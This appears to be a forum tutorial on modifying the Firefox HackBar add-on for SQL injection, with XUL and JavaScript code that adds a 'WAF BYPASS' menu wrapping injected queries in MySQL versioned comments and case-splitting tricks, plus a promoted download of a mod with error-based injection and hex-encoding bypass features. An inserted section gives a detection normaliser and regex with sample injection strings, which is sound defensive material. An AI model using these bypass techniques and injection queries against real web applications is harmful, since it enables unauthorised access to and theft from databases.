Today I will give you a little start with customizing the Mozilla plugin HackBar!
Required knowledge for customizing: HTML, CSS, JS
(or you can download my ready-to-use Hackbar below in this post)
First of all, most of the credit should go to the original coders of HackBar: Johan Adriaans & Pedro Laguna!
1) Get the Hackbar files
If you haven't installed HackBar yet, you can download it through the Mozilla add-on manager or use my version below.
If you have installed HackBar, you can use the clean install file for your mods. Just copy the install file called:
{F5DDF39C-9293-4d5e-9AA8-E04E6DD5E9B4}.xpi
usually located in:
For Windows users:
C:\user\user_profile\appdata\roaming\mozilla\firefox\profiles\profile.default\extensions
For Linux users:
/home/user/.mozilla/firefox/k65bvcin.default/extensions
Just unpack this file into a folder (use WinRAR or similar). The unpacked files are what we want to edit.
2) About the files
chrome/content/hackbar.xul
This is the face of HackBar. If you want to add buttons, inputs or anything else, do it here.
chrome/locale/en-US/hackbar.dtd
All label descriptions are stored here. If you add buttons in hackbar.xul, the buttons are labeled in hackbar.dtd
(you can also label all tags directly in the .xul, but the .dtd is better for changing languages etc.)
chrome/content/main.js
The basic JS functions are stored here.
chrome/content/SQL.js
All SQL statements are stored here (they are just .js functions).
...and so on...
3) Customizing / modifying hackbar
First of all, I want to say that I only show a few things here. I don't know what the response to this topic will be.
More functions are included in the HackBar you can download below.
First example:
My first intention was to change the HackBar-generated string UNION SELECT to UNION+ALL+SELECT.
To do this we have to change the variable txt in SQL.js at line 38:
Code:
var txt = "UNION SELECT " + colArray.join( ',' );
2nd example:
Add a bypass function (for a demonstration, install my HackBar from the download package below).
To do this you have to make the following changes:
First add the new button and popup menu in chrome/content/hackbar.xul
Code:
<!-- WAF BYPASS MENU -->
<toolbarbutton class="menuitem-iconic" type="menu" label="&hackbar.WAFMenuLabel;" onmouseover="HackBar.GUI.openToolbarButton(this)">
  <menupopup>
    <menuitem class="menuitem-iconic" image="chrome://hackbar/skin/database.png" label="/*!_STRING_*/" oncommand="HackBar.SQL.CalcWaf('1')"/>
    <menuitem class="menuitem-iconic" image="chrome://hackbar/skin/database.png" label="/*!50000_STRING_*/" oncommand="HackBar.SQL.CalcWaf('2')"/>
    <menuitem class="menuitem-iconic" image="chrome://hackbar/skin/database.png" label="/*!12345_STRING_*/" oncommand="HackBar.SQL.CalcWaf('3')"/>
    <menuitem class="menuitem-iconic" image="chrome://hackbar/skin/database.png" label="cutoffCUTOFFWAFwaf" oncommand="HackBar.SQL.CalcWaf('4')"/>
  </menupopup>
</toolbarbutton>
<!-- / WAF BYPASS MENU -->
Then add the label texts in chrome/locale/en-US/hackbar.dtd
Code:
<!ENTITY hackbar.WAFMenuLabel "WAF BYPASS">
and finally add in chrome/content/SQL.js the primary function:
Code:
/* WAF CALCULATE */
CalcWaf: function (choice)
{
  var txt = hackBar.getSelectedText();
  switch (choice) {
    case '1': // spaces -> /**/, result wrapped in /*! ... */
      txt = txt.replace(/ /g, "/**/");
      txt = "/*!" + txt + "*/";
      break;
    case '2': // spaces -> +, result wrapped in /*!50000 ... */
      txt = txt.replace(/ /g, "+");
      txt = "/*!50000" + txt + "*/";
      break;
    case '3': // spaces -> +, result wrapped in /*!12345 ... */
      txt = txt.replace(/ /g, "+");
      txt = "/*!12345" + txt + "*/";
      break;
    case '4': // lower-case text with its upper-case copy inserted at position 2, spaces -> /*&a=*/
      txt = txt.toLowerCase();
      // inline insert instead of patching String.prototype for every script in the window
      txt = txt.substring(0, 2) + txt.toUpperCase() + txt.substring(2);
      txt = txt.replace(/ /g, "/*&a=*/");
      break;
  }
  hackBar.setSelectedText( txt );
}
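Seen from the filter side, the four CalcWaf outputs only differ from plain UNION SELECT in comment and whitespace syntax, so a rule that normalises the request before matching still recognises them. The following is an added example, not part of the original post or of HackBar; the function names and the sample query strings are constructed for illustration.

```javascript
// Added example, not HackBar code. All names and sample inputs are constructed.
// Roughly canonicalise a raw query string as MySQL would read it, then match.

function normalizeSqlInput(rawQuery) {
  let s = rawQuery.replace(/\+/g, ' ');          // '+' means space in a query string
  try {
    s = decodeURIComponent(s);
  } catch (e) {
    // malformed %-escape: keep the undecoded text rather than skipping the check
  }
  let prev;
  do {                                           // repeat until nothing changes
    prev = s;
    s = s.replace(/\/\*!\d*/g, ' ');             // "/*!" or "/*!50000": body is executed
    s = s.replace(/\/\*[\s\S]*?\*\//g, ' ');     // "/**/", "/*&a=*/": acts as whitespace
    s = s.replace(/\*\//g, ' ');                 // closer left over from "/*!...*/"
  } while (s !== prev);
  return s.replace(/\s+/g, ' ').trim().toLowerCase();
}

// No word boundaries on purpose: CalcWaf case '4' embeds the keyword inside
// a copy of itself ("unUNION...SELECTion"), which \b would miss.
const UNION_SELECT = /union\s+(?:all\s+)?select/;

function flagsUnionSelect(rawQuery) {
  return UNION_SELECT.test(normalizeSqlInput(rawQuery));
}

// Constructed samples: what the tutorial's edits emit for "union select".
const samples = [
  'id=1+UNION+ALL+SELECT+1,2',
  'id=1+/*!union/**/select*/+1,2',
  'id=1+/*!50000union+select*/+1,2',
  'id=1+/*!12345union+select*/+1,2',
  'id=1+unUNION/*&a=*/SELECTion/*&a=*/select+1,2',
  'q=student+union+elections',                   // benign control
];

for (const q of samples) {
  console.log(flagsUnionSelect(q) ? 'FLAG ' : 'ok   ', normalizeSqlInput(q));
}
```

The matcher should reject or log the request; deleting the matched keyword and passing the rest on is what the case '4' form relies on.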
4) Install modified hackbar
When you are done with your changes, just replace the files in the original archive via drag and drop.
You can also pack the files into a new archive. I tested with 7-Zip and WinRAR and both work fine.
NOTICE: choose ZIP as the format if you use WinRAR, and rename the extension to .xpi.
After you have packed your archive, just right-click on it and "open with Firefox" --> the install dialog will appear --> normal install (you don't have to uninstall earlier versions because the files overwrite themselves).
For those of you who want to make the changes LIVE without uninstalling / installing HackBar with every change, do this:
THAT'S IT FOR THE TUTORIAL. TO DOWNLOAD MY READY-TO-USE HACKBAR, READ THIS:
OK guys, here we go with the next and last public version* of my HackBar mod (1.4.2).
*Of course I will fix bugs in 1.4.2 if they are reported to me.
Features:
- added more select-queries
- URL-Encode-function
- Base64 t.PRO function
- more Error-Based and Double-Query-Based (Big THX to _USERNAME_ for that part)
- added group+by function
- simple WAF bypass (comment and CutOff)
CHANGELOG:
DOWNLOAD t.PRO HACKBAR VERSION 1.4.2
password for WINRAR-archive: /!"§++u6943$%&~+#~/()~TPRO~=io?
(screens not sorted...)
1) Use [BASE64] as a placeholder in the HackBar URL field.
2) When you execute, HackBar will automatically convert [BASE64] to a Base64-encoded string (replacing the + with whitespace)!
0xHEX
This is a function that already exists in the original HackBar, but without adding the 0x at the start.
This function will only be loved by my challenge friends for better/faster converting between hex and strings (normal injectors really don't need it).
%URL
This is the new URL-encoding function.
Another WAF-BYPASS-TECHNIQUE.
HackBar now automatically encodes the database, table and column names in a given query to 0xHEX.
For example, if you use the HackBar query:
PHP Code:
+from+information_schema.tables+where+table_schema=database()
HackBar asks you with a prompt which database you want to concat.
--> If you choose database(), HackBar does not hex-encode it.
--> If you use another DB name, HackBar converts the DB name to 0xHEX automatically.
I think it's a nice feature!
OK guys, that's it. I hope you like it!
(to install, just right-click --> open with Firefox)
If you find any bugs, please report them via PM!
Please test and feel free to leave any comments!
Greetz TechProspect
Credit: T-pro